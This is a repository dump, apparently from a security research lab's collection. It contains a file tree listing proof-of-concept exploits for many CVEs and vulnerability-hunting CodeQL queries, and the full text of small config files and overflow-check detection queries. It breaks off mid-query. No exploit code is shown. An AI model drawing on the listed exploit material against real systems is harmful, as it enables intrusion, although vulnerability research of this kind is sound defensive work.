├── .github
└── ISSUE_TEMPLATE
│ ├── config.yml
│ └── wall-of-fame.yml
├── .gitignore
├── .gitmodules
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── CodeQL_Queries
├── .gitignore
├── actions
│ └── README.md
├── cpp
│ ├── .project
│ ├── .qlpath
│ ├── ChakraCore-bad-overflow-check
│ │ ├── BadOverflowCheck.ql
│ │ ├── README.md
│ │ └── steps
│ │ │ ├── 01_overflow_checks.ql
│ │ │ ├── 02_var_size.ql
│ │ │ └── 03_bad_overflow_check.ql
│ ├── Chrome
│ │ ├── README.md
│ │ ├── bindings.qll
│ │ ├── callback_tracking.qll
│ │ ├── callbacks.qll
│ │ ├── collections.qll
│ │ ├── common.qll
│ │ ├── field.qll
│ │ ├── object_lifetime
│ │ │ ├── lifetime_management.qll
│ │ │ └── obj_lifetime.qll
│ │ ├── pointers
│ │ │ ├── managed_ptr.qll
│ │ │ └── raw_ptr.qll
│ │ ├── qlpack.yml
│ │ └── queries
│ │ │ ├── README.md
│ │ │ ├── callback_unretained.ql
│ │ │ ├── callback_unretained_field.ql
│ │ │ ├── no_cleanup.ql
│ │ │ └── non_trivial_cleanup.ql
│ ├── Facebook_Fizz_CVE-2019-3560
│ │ ├── FizzOverflow.ql
│ │ ├── NarrowingConversions.ql
│ │ └── README.md
│ ├── MinIntNegate
│ │ ├── .gitignore
│ │ ├── 00_MinIntNegate.ql
│ │ ├── 01_MinIntNegate.ql
│ │ ├── 02_MinIntNegate.ql
│ │ ├── 03_MinIntNegate.ql
│ │ ├── 04_MinIntNegate.ql
│ │ ├── 05_MinIntNegate.ql
│ │ ├── 06_MinIntNegate.ql
│ │ ├── 07_MinIntNegate.ql
│ │ ├── README.md
│ │ └── test.cpp
│ ├── OpenSSL-hostname-validation
│ │ ├── BoostAsioMissingVerifyCallback.ql
│ │ ├── OpenSSLMissingVerifyCallback.ql
│ │ ├── OpenSSLPreverifyIgnored.ql
│ │ ├── OpenSSLVerify.qll
│ │ └── README.md
│ ├── Qualcomm-MSM-copy_from_user
│ │ ├── 00_copy_from_user.ql
│ │ ├── 01_copy_from_user_annotated.ql
│ │ ├── 02_filter_with_upperbound.ql
│ │ ├── 03_filter_with_upperbound.ql
│ │ ├── 04_safe_malloc.ql
│ │ ├── 05_filter_with_upperbound_and_safe_malloc.ql
│ │ ├── 06_stackaddress_dataflow.ql
│ │ └── README.md
│ ├── README.md
│ ├── XNU_DTrace_CVE-2017-13782
│ │ ├── DTraceUnsafeIndex.ql
│ │ └── README.md
│ ├── XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160
│ │ ├── BCopyNegativeSize.ql
│ │ └── README.md
│ ├── XNU_icmp_error_CVE-2018-4407
│ │ ├── 00_mbuf_copydata_tainted_size.ql
│ │ ├── 01_paths_to_icmp_error.ql
│ │ ├── 02_paths_to_icmp_error.ql
│ │ ├── 03_paths_to_icmp_error.ql
│ │ └── README.md
│ ├── XNU_packet-mangler_CVE-2018-4249
│ │ ├── ArrayIndexMightOverflow.ql
│ │ ├── InfiniteLoop.ql
│ │ ├── README.md
│ │ └── tcphdr_mbuf_copydata.ql
│ ├── libjpeg-turbo-oob
│ │ ├── 01_find_colormap_index.ql
│ │ ├── 02a_find_guarded_colormap_index.ql
│ │ ├── 02b_find_guarded_colormap_index_working.ql
│ │ ├── 03_find_unguarded_colormap_index.ql
│ │ ├── 04_find_unguarded_colormap_no_fps.ql
│ │ ├── 05_find_unguarded_colormap_generalised.ql
│ │ └── README.md
│ ├── libssh2_eating_error_codes
│ │ ├── 00_error_codes.ql
│ │ ├── 01_error_codes_call.ql
│ │ ├── 02_eating_error_codes.ql
│ │ ├── 03_eating_error_codes_localflow.ql
│ │ ├── 04_eating_error_codes_localflow_rangeanalysis.ql
│ │ └── README.md
│ ├── qlpack.yml
│ ├── queries.xml
│ ├── rsyslog_CVE-2018-1000140
│ │ ├── 01_find_snprintf.ql
│ │ ├── 02_find_snprintf_with_result.ql
│ │ ├── 03_find_snprintf_with_result_and_string.ql
│ │ ├── 04_find_snprintf_with_result_and_string_and_local_taint.ql
│ │ ├── 05_find_snprintf_with_result_and_string_and_local_taint_ub.ql
│ │ ├── README.md
│ │ └── Video
│ │ │ ├── README.md
│ │ │ └── rsyslog.srt
│ └── rsyslog_CVE-2019-17041
│ │ ├── 01_find_data_input.ql
│ │ ├── 02_find_data_pointer_usage.ql
│ │ ├── 03_find_data_pointer_usage_extended.ql
│ │ ├── 04_find_parsers.ql
│ │ ├── 05_find_tainted_iterations.ql
│ │ └── README.md
├── csharp
│ ├── .project
│ ├── .qlpath
│ ├── TelerikRepeatedEncryptionKey
│ │ ├── README.md
│ │ └── TelerikRepeatedEncryptionKey.ql
│ ├── ZipSlip
│ │ ├── 01_Sources.ql
│ │ ├── 02_Sources.ql
│ │ ├── 03_Sinks.ql
│ │ ├── 04_SinkArgument.ql
│ │ ├── 05_LocalFlow.ql
│ │ ├── 06_GlobalFlow.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
├── java
│ ├── .project
│ ├── .qlpath
│ ├── Apache_Struts_CVE-2017-9805
│ │ ├── README.md
│ │ ├── UnsafeDeserialization.qll
│ │ └── UnsafeDeserializationStruts.ql
│ ├── Apache_Struts_CVE-2018-11776
│ │ ├── 01_compileAndExecute.ql
│ │ ├── 02_compileAndExecute.ql
│ │ ├── 03_compileAndExecute.ql
│ │ ├── 04_compileAndExecute.ql
│ │ ├── 05_getNamespace.ql
│ │ ├── 06_getNamespace.ql
│ │ ├── 07_getNamespace.ql
│ │ ├── 08_getNamespace.ql
│ │ ├── 09_dataflow.ql
│ │ ├── 10_dataflow_with_barrier.ql
│ │ ├── 11_dataflow_with_additional_flow_step.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
└── javascript
│ ├── .project
│ ├── .qlpath
│ ├── Etherpad_CVE-2018-6835
│ ├── 01_HTTP_handlers.ql
│ ├── 02_getASendMethodCall.ql
│ ├── 03_LikelySendArgument.ql
│ ├── 04_LikelyRequestParameter.ql
│ ├── 05_DataFlow.ql
│ ├── 06_DataFlow_With_Sanitizer.ql
│ ├── README.md
│ └── alternative
│ │ ├── 01_ReflectedXss.ql
│ │ ├── 02_SwaggerRouteHandler.ql
│ │ ├── 03_ResponseSendArgument.ql
│ │ ├── 04_ResponseSendAccess.ql
│ │ ├── 05_ResponseSendArgumentWithAliasing.ql
│ │ ├── 06_ReflectedXss.ql
│ │ ├── 07_ReflectedXssWithSanitizer.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
├── Conferences
└── 2020
│ ├── H-CON
│ └── HC0N.pdf
│ ├── OffensiveCon
│ ├── cant-grep-this.pdf
│ └── exercises
│ │ ├── dataflow
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── functions
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── quantifiers
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── tainttracking
│ │ └── ex0.ql
│ │ ├── testcase
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ ├── ex5.ql
│ │ ├── ex6.ql
│ │ ├── ex7.ql
│ │ └── ex8.ql
│ │ ├── types
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ └── ex5.ql
│ │ └── variables
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ ├── ex5.ql
│ │ └── ex6.ql
│ └── RootedCON
│ └── Presentacion.pdf
├── Fuzzing
└── GStreamer
│ ├── README.md
│ ├── aux.h
│ ├── labeler
│ ├── MP4.cc
│ ├── MP4.h
│ ├── fourcc.h
│ └── labeler.h
│ ├── main.cc
│ ├── makefile
│ ├── tree.cc
│ └── tree.h
├── LICENSE.md
├── Meetup
├── 2019-11
│ ├── README.md
│ └── presentations
│ │ ├── Bug hunting with CodeQL.pdf
│ │ └── Newbie fuzzing gains.pdf
├── 2020-01
│ ├── Breaking-SAML-dotNet-Edition.pdf
│ ├── Hunting-Backdoors-in-Open-Source.pdf
│ ├── No-More-Whack-A-Mole.pdf
│ └── README.md
└── 2020-04
│ ├── Managing-content-security-and-samesite-cookies.pdf
│ ├── README.md
│ ├── ThreatModelDevOps-GitHubSecMeetup.pdf
│ └── inql.pdf
├── README.md
├── SecurityExploits
├── Android
│ ├── Mali
│ │ ├── CVE-2025-0072
│ │ │ ├── README.md
│ │ │ ├── firmware_offsets.h
│ │ │ ├── log_utils.h
│ │ │ ├── mali_base_common_kernel.h
│ │ │ ├── mali_base_csf_kernel.h
│ │ │ ├── mali_base_kernel.h
│ │ │ ├── mali_kbase_csf_ioctl.h
│ │ │ ├── mali_kbase_ioctl.h
│ │ │ ├── mali_userio.c
│ │ │ ├── mem_read_write.c
│ │ │ ├── mem_read_write.h
│ │ │ ├── mempool_utils.c
│ │ │ └── mempool_utils.h
│ │ ├── CVE_2022_20186
│ │ │ ├── README.md
│ │ │ ├── mali.h
│ │ │ ├── mali_alias.c
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ └── midgard.h
│ │ ├── CVE_2022_38181
│ │ │ ├── README.md
│ │ │ ├── hello-jni2.c
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_shrinker_mmap.c
│ │ │ └── midgard.h
│ │ ├── CVE_2022_46395
│ │ │ ├── README.md
│ │ │ ├── log_utils.h
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_user_buf.c
│ │ │ ├── mem_write.c
│ │ │ ├── mem_write.h
│ │ │ ├── mempool_utils.c
│ │ │ ├── mempool_utils.h
│ │ │ └── midgard.h
│ │ ├── CVE_2023_6241
│ │ │ ├── README.md
│ │ │ ├── firmware_offsets.h
│ │ │ ├── log_utils.h
│ │ │ ├── mali_base_common_kernel.h
│ │ │ ├── mali_base_csf_kernel.h
│ │ │ ├── mali_base_kernel.h
│ │ │ ├── mali_jit_csf.c
│ │ │ ├── mali_kbase_csf_ioctl.h
│ │ │ ├── mali_kbase_ioctl.h
│ │ │ ├── mem_read_write.c
│ │ │ ├── mem_read_write.h
│ │ │ ├── mempool_utils.c
│ │ │ └── mempool_utils.h
│ │ └── GHSL-2023-005
│ │ │ ├── README.md
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_jit.c
│ │ │ └── midgard.h
│ └── Qualcomm
│ │ ├── CVE-2020-11239
│ │ ├── README.md
│ │ ├── kgsl_exploit.h
│ │ └── kgsl_exploit_slab_a71.c
│ │ ├── CVE-2022-22057
│ │ ├── README.md
│ │ ├── addr_utils.h
│ │ ├── cpu_utils.c
│ │ ├── cpu_utils.h
│ │ ├── fake_obj_util.c
│ │ ├── fake_obj_util.h
│ │ ├── ion_utils.c
│ │ ├── ion_utils.h
│ │ ├── kgsl_ioctl.h
│ │ ├── sendmsg_spray.c
│ │ ├── sendmsg_spray.h
│ │ ├── signalfd_spray.c
│ │ ├── signalfd_spray.h
│ │ ├── timeline_wait.c
│ │ ├── work_queue_utils.c
│ │ └── work_queue_utils.h
│ │ ├── CVE_2022_25664
│ │ ├── README.md
│ │ ├── adreno_kernel
│ │ │ ├── adreno_cmd.c
│ │ │ ├── adreno_cmd.h
│ │ │ ├── adreno_kernel.c
│ │ │ ├── dma_search.h
│ │ │ ├── kgsl_utils.c
│ │ │ └── kgsl_utils.h
│ │ └── adreno_user
│ │ │ ├── adreno.h
│ │ │ └── adreno_user.c
│ │ └── NPU
│ │ ├── README.md
│ │ ├── bpf_tools.h
│ │ ├── npu_shell.c
│ │ ├── npu_shell.h
│ │ ├── sendmsg_spray.c
│ │ └── sendmsg_spray.h
├── Ansible
│ └── fetch_CVE-2019-3828
│ │ ├── README.md
│ │ ├── server
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── .ssh
│ │ │ └── authorized_keys
│ │ │ └── scripts
│ │ │ ├── bashrc
│ │ │ └── enable_exploit.sh
│ │ └── zeuss
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .ssh
│ │ ├── id_ed25519
│ │ └── id_ed25519.pub
│ │ └── config
│ │ ├── ansible.cfg
│ │ ├── inventory.d
│ │ └── inventory
│ │ └── myfetch.yml
├── Apache
│ └── Struts
│ │ └── CVE-2018-11776
│ │ ├── README.md
│ │ ├── struts-attacker
│ │ ├── Dockerfile
│ │ └── src
│ │ │ ├── Makefile
│ │ │ ├── copykey.c
│ │ │ ├── startcalc.c
│ │ │ ├── utils.c
│ │ │ └── utils.h
│ │ └── struts-server
│ │ ├── Dockerfile
│ │ └── struts-actionchaining.xml
├── CImg
│ ├── Dockerfile
│ ├── README.md
│ └── poc.c
├── Chrome
│ ├── SandboxEscape
│ │ ├── CVE-2021-30528
│ │ │ ├── README.md
│ │ │ ├── aarch64
│ │ │ │ ├── README.md
│ │ │ │ ├── arm64_renderer.patch
│ │ │ │ ├── browser.patch
│ │ │ │ ├── trigger.html
│ │ │ │ └── trigger2_64.html
│ │ │ ├── arm
│ │ │ │ ├── README.md
│ │ │ │ ├── arm_renderer.patch
│ │ │ │ ├── browser.patch
│ │ │ │ ├── trigger.html
│ │ │ │ └── trigger2_88.html
│ │ │ └── copy_mojo_js_bindings.py
│ │ └── GHSL-2020-165
│ │ │ ├── README.md
│ │ │ ├── copy_mojo_js_bindings.py
│ │ │ ├── payment_request_clip.html
│ │ │ ├── payment_request_clip2.html
│ │ │ ├── payment_request_jam_clip.html
│ │ │ └── sbx.patch
│ ├── blink
│ │ ├── CVE-2020-15972
│ │ │ ├── README.md
│ │ │ ├── out2.mp3
│ │ │ ├── tear-down.js
│ │ │ ├── tear_down2.html
│ │ │ ├── tear_down2_virtual.html
│ │ │ └── tear_down_android_rce_release.html
│ │ └── CVE-2020-6449
│ │ │ ├── README.md
│ │ │ ├── delay-processor.js
│ │ │ ├── finished_delay_release.html
│ │ │ ├── finished_delay_release2.html
│ │ │ ├── test-processor.js
│ │ │ └── test-processor2.js
│ └── v8
│ │ ├── CVE-2021-30632
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE-2021-37975
│ │ ├── README.md
│ │ ├── chrome_poc_child.html
│ │ ├── chrome_poc_parent.html
│ │ └── poc.js
│ │ ├── CVE_2022_1134
│ │ ├── README.md
│ │ └── superic_rce.html
│ │ ├── CVE_2023_3420
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE_2023_4069
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE_2024_3833
│ │ ├── README.md
│ │ ├── import_shell.js
│ │ ├── trial-token.patch
│ │ └── wasm_poc.html
│ │ └── CVE_2024_5830
│ │ ├── README.md
│ │ └── calc.html
├── Facebook
│ └── Fizz
│ │ └── CVE-2019-3560
│ │ ├── README.md
│ │ ├── attacker
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── diff.txt
│ │ │ └── poc
│ │ │ ├── Makefile
│ │ │ └── poc.c
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ └── certs
│ │ ├── ca.config
│ │ ├── clean.sh
│ │ ├── create-certs.sh
│ │ └── server.config
├── Microsoft
│ └── ChakraCore
│ │ └── CVE-2017-0141
│ │ ├── README.md
│ │ └── cve-2017-0141.js
├── README.md
├── SANE
│ └── epsonds_CVE-2020-12861
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── fakescanner.cpp
│ │ ├── glibc_heap_exploit_demos
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── home
│ │ │ ├── .gitignore
│ │ │ ├── .tmux.conf
│ │ │ ├── 01_chunk_layout.c
│ │ │ ├── 02_arithmetic_with_top.c
│ │ │ ├── 03_overlap_top_chunk.c
│ │ │ ├── 04_A_fastbin_reverse_into_tcache.c
│ │ │ ├── 04_B_fastbin_reverse_into_tcache.c
│ │ │ ├── 05_shrink_tcache_chunk.c
│ │ │ └── Makefile
│ │ ├── sane_backends_exploit.cpp
│ │ ├── utils.cpp
│ │ └── utils.hpp
├── Ubuntu
│ ├── Apport_TOCTOU_get_ignore_dom_CVE-2019-7307
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── README_CVE-2019-11476.md
│ │ ├── README_CVE-2019-11481.md
│ │ ├── README_CVE-2019-11484.md
│ │ ├── README_CVE-2019-15790.md
│ │ ├── README_CVE-2019-7307.md
│ │ ├── encoding.c
│ │ ├── encoding.h
│ │ ├── gencrashreport.cpp
│ │ ├── killwhoopsie1.cpp
│ │ ├── killwhoopsie2.cpp
│ │ ├── load_crash_report.cpp
│ │ ├── load_crash_report.hpp
│ │ ├── memory_dumps
│ │ │ ├── README.md
│ │ │ ├── home1.txt
│ │ │ ├── home2.txt
│ │ │ ├── home3.txt
│ │ │ ├── home4.txt
│ │ │ ├── work1.txt
│ │ │ ├── work2.txt
│ │ │ ├── work3.txt
│ │ │ └── work4.txt
│ │ ├── restart_whoopsie.cpp
│ │ ├── segv.c
│ │ ├── utils.cpp
│ │ ├── utils.hpp
│ │ ├── whoopsie_exploit.cpp
│ │ └── whoopsie_exploit.hpp
│ └── accountsservice_CVE-2021-3939
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README-build-accountsservice.md
│ │ ├── README.md
│ │ ├── observations
│ │ ├── info.txt
│ │ ├── instrumentation.md
│ │ └── polkit_sequence.txt
│ │ ├── poc.cpp
│ │ ├── poc2.cpp
│ │ └── poc3.cpp
├── apple
│ └── darwin-xnu
│ │ ├── DTrace
│ │ └── CVE-2017-13782
│ │ │ ├── README.md
│ │ │ └── cve-2017-13782-poc.c
│ │ ├── icmp_error_CVE-2018-4407
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── crash_all.c
│ │ ├── direct_attack.c
│ │ ├── send_packet.c
│ │ ├── send_packet.h
│ │ ├── utils.c
│ │ └── utils.h
│ │ ├── nfs_vfsops_CVE-2018-4259
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── kevfs.c
│ │ └── nfs.x
│ │ └── packet_mangler_CVE-2017-13904
│ │ ├── README.md
│ │ └── cve-2017-13904-poc.c
├── freedesktop
│ └── DBus-CVE-2020-12049
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ └── fd_dos.cpp
├── kafkaui
│ └── compose.yml
├── libcue
│ └── track_set_index_CVE-2023-43641
│ │ ├── .gitignore
│ │ ├── CVE-2023-43641-poc-simple.cue
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── fedora38.cue
│ │ ├── lunar.cue
│ │ ├── mkcue.cpp
│ │ ├── search-bar-screenshot.png
│ │ ├── utils.cpp
│ │ └── utils.h
├── libssh
│ └── pubkey-auth-bypass-CVE-2023-2283
│ │ ├── README.md
│ │ ├── attacker
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── .bash_history
│ │ │ ├── .tmux.conf
│ │ │ ├── diff.txt
│ │ │ ├── id_ed25519.pub
│ │ │ └── id_rsa.pub
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .bash_history
│ │ ├── .ssh
│ │ ├── authorized_keys
│ │ ├── id_ed25519.pub
│ │ └── id_rsa.pub
│ │ └── .tmux.conf
├── libssh2
│ ├── out_of_bounds_read_disconnect_CVE-2019-17498
│ │ ├── README.md
│ │ ├── client
│ │ │ ├── Dockerfile
│ │ │ └── home
│ │ │ │ └── .tmux.conf
│ │ └── server
│ │ │ ├── Dockerfile
│ │ │ └── home
│ │ │ ├── .tmux.conf
│ │ │ └── poc.bin
│ └── out_of_bounds_read_kex_CVE-2019-13115
│ │ ├── README.md
│ │ ├── client
│ │ ├── Dockerfile
│ │ └── home
│ │ │ └── .tmux.conf
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .tmux.conf
│ │ └── diff.txt
├── polkit
│ ├── authentication_bypass_CVE-2021-3560
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README.md
│ │ ├── createuser.cpp
│ │ └── installpackage.cpp
│ └── file_descriptor_exhaustion_CVE-2021-4115
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README.md
│ │ └── locksessions.cpp
├── rsyslog
│ └── CVE-2018-1000140_snprintf_librelp
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── benevolent
│ │ ├── certs
│ │ │ ├── ca.config
│ │ │ ├── clean.sh
│ │ │ ├── client.config
│ │ │ ├── create-certs.sh
│ │ │ └── server.config
│ │ ├── rsyslog-client.conf
│ │ └── rsyslog-server.conf
│ │ ├── build-all.sh
│ │ └── malicious
│ │ ├── kevcertz
│ │ ├── clean.sh
│ │ ├── client.config
│ │ └── create-certz.sh
│ │ └── rsyslog-client.conf
├── strongSwan
│ └── CVE-2018-5388
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── stroke_patch.txt
└── vivo-project
│ └── CVE-2019-6986
│ ├── README.md
│ ├── vivo-attacker
│ ├── Dockerfile
│ └── post.sh
│ └── vivo-server
│ ├── Dockerfile
│ └── init_mysql.sh
├── docs
└── report-template.md
└── mastodon
└── verifications.html
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: false
2 | contact_links:
3 | - name: CodeQL Feedback
4 | url: https://github.com/github/securitylab/discussions/new
5 | about: Feedback related with CodeQL CLI, languages, libraries, documentation, etc.
6 | - name: Questions about the CodeQL language
7 | url: https://github.com/github/securitylab/discussions/new
8 | about: Questions about any of the CodeQL query languages.
9 |
10 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | *~
3 | /.metadata/
4 | .vscode
5 | .cache
6 | .venv
7 |
8 | # Ignore any generated TypeScript -> JavaScript files
9 | .github/actions/replicate-issue/*.js
10 |
11 | # Logs
12 | logs
13 | *.log
14 | npm-debug.log*
15 |
16 | # Dependency directories
17 | node_modules/
18 |
19 | # Typescript v1 declaration files
20 | typings/
21 |
22 | # Optional npm cache directory
23 | .npm
24 |
25 | # Optional eslint cache
26 | .eslintcache
27 |
28 | # Typescript debugging
29 | **/*.js.map
30 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse"]
2 | path = SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
3 | url = https://github.com/kevinbackhouse/DBusParse.git
4 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/DBusParse"]
5 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse
6 | url = https://github.com/kevinbackhouse/DBusParse.git
7 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoop"]
8 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop
9 | url = https://github.com/kevinbackhouse/EPollLoop.git
10 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoopDBusHandler"]
11 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler
12 | url = https://github.com/kevinbackhouse/EPollLoopDBusHandler.git
13 | [submodule "SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse"]
14 | path = SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse
15 | url = https://github.com/kevinbackhouse/DBusParse
16 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | ## Contributing
2 |
3 | [fork]: https://github.com/github/vscode-codeql/fork
4 | [pr]: https://github.com/github/vscode-codeql/compare
5 | [style]: https://primer.style
6 | [code-of-conduct]: CODE_OF_CONDUCT.md
7 |
8 | Hi there! We're thrilled that you'd like to contribute to this project. Your help is essential for keeping it great.
9 |
10 | Contributions to this project are [released](https://help.github.com/articles/github-terms-of-service/#6-contributions-under-repository-license) to the public under the [project's open source license](LICENSE.md).
11 |
12 | Please note that this project is released with a [Contributor Code of Conduct][code-of-conduct]. By participating in this project you agree to abide by its terms.
13 |
14 | ## Submitting a pull request
15 |
16 | 0. [Fork][fork] and clone the repository
17 | 0. Set up a local build
18 | 0. Create a new branch: `git checkout -b my-branch-name`
19 | 0. Make your change
20 | 0. Push to your fork and [submit a pull request][pr]
21 | 0. Pat yourself on the back and wait for your pull request to be reviewed and merged.
22 |
23 | ## Resources
24 |
25 | - [How to Contribute to Open Source](https://opensource.guide/how-to-contribute/)
26 | - [Using Pull Requests](https://help.github.com/articles/about-pull-requests/)
27 | - [GitHub Help](https://help.github.com)
28 |
--------------------------------------------------------------------------------
/CodeQL_Queries/.gitignore:
--------------------------------------------------------------------------------
1 | *.cache
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/actions/README.md:
--------------------------------------------------------------------------------
1 | The queries were merged into [CodeQL repository](https://github.com/github/codeql/tree/main/javascript/ql/src/experimental/Security/CWE-094).
2 | Read more about the research on [https://securitylab.github.com/research/github-actions-untrusted-input](https://securitylab.github.com/research/github-actions-untrusted-input).
3 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-cpp
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.cpp.library
5 |
6 | com.semmle.code.cpp.dbscheme
7 |
8 | cpp
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | predicate isSmall(Expr e) {
4 | e.getType().getSize() < 4
5 | }
6 |
7 | from AddExpr a, Variable v, RelationalOperation cmp
8 | where a.getAnOperand() = v.getAnAccess()
9 | and cmp.getAnOperand() = a
10 | and cmp.getAnOperand() = v.getAnAccess()
11 | and forall(Expr op | op = a.getAnOperand() | isSmall(op))
12 | and not isSmall(a.getExplicitlyConverted())
13 | select cmp, "Bad overflow check"
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md:
--------------------------------------------------------------------------------
1 | Use [this snapshot](https://github.com/github/securitylab/releases/download/chakracore-codeql-database/ChakraCore-revision-2017-April-12--18-13-26.zip)
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /** Matches `var < var + ???`. */
4 | predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
5 | compare.getAnOperand() = var.getAnAccess() and
6 | compare.getAnOperand() = add and
7 | add.getAnOperand() = var.getAnAccess()
8 | }
9 |
10 | from LocalScopeVariable var, AddExpr add
11 | where overflowCheck(var, add, _)
12 | select add, "Overflow check on variable of type " + var.getUnderlyingType()
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /** Matches `var < var + ???`. */
4 | predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
5 | compare.getAnOperand() = var.getAnAccess() and
6 | compare.getAnOperand() = add and
7 | add.getAnOperand() = var.getAnAccess()
8 | }
9 |
10 | from LocalScopeVariable var, AddExpr add
11 | where overflowCheck(var, add, _)
12 | and var.getType().getSize() < 4
13 | select add, "Overflow check on variable of type " + var.getUnderlyingType()
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /** Matches `var < var + ???`. */
4 | predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
5 | compare.getAnOperand() = var.getAnAccess() and
6 | compare.getAnOperand() = add and
7 | add.getAnOperand() = var.getAnAccess()
8 | }
9 |
10 | from LocalScopeVariable var, AddExpr add
11 | where overflowCheck(var, add, _)
12 | and var.getType().getSize() < 4
13 | and not add.getConversion+().getType().getSize() < 4
14 | select add, "Bad overflow check on variable of type " + var.getUnderlyingType()
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/field.qll:
--------------------------------------------------------------------------------
1 | import cpp
2 | import common
3 | import collections
4 | import pointers.raw_ptr
5 |
6 | /**
7 | * An expression that assigns values to a general field. Can be an assignment,
8 | * or an index expression that modifies a collection etc.
9 | */
10 | Expr generalAssignValue(Field f) {
11 | result = f.getAnAssignedValue() or
12 | //normal assignment
13 | exists(GeneralAssignment expr | expr.getLValue() = f.getAnAccess() and
14 | expr.getRValue() = result
15 | )
16 | or
17 | //Adding to a collection field
18 | exists(FunctionCall fc | fc.getTarget() instanceof AddToCollection and result = fc.getAnArgument() and
19 | getQualifier(fc) = f.getAnAccess()
20 | )
21 | or
22 | //setting managed pointers.
23 | exists(FunctionCall fc | fc.getTarget() instanceof ManagedPtrSetFunction and
24 | getQualifier(fc) = f.getAnAccess() and
25 | result = fc.getAnArgument()
26 | )
27 | or
28 | //index operator to assign values to a collection field.
